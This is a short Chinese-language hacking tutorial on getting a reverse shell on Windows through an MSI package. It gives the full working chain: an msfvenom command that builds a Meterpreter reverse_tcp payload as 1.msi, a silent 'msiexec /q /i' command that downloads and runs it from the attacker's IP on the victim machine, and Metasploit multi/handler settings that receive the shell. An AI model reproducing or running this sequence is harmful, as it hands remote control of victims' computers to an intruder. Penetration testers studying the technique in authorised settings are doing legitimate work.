使用 MSI 软件包获取反向 Shell
Windows 操作系统已安装 Windows 安装程序引擎,MSI 软件包使用此引擎来安装应用程序。解释软件包和安装产品的可执行程序是 Msiexec.exe。
通过 msfvenom 启动 msiexec 攻击
让我们使用 Windows Meterpreter 载荷生成一个 MSI 软件包文件 (1.msi),如下所示;
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f msi > 1.msi
在目标端,当受害者在远程计算机上执行 1.msi 文件时,使用以下实用程序;
msiexec /q /i http://192.168.1.109/1.msi
攻击者通过启动 multi/handler 作为监听器,从而获得受害者计算机的反向 shell。
- use exploit/multi/handler
- set pyaload windows/meterpreter/reverse_tcp
- set lhost 192.168.1.109
- exploit
广告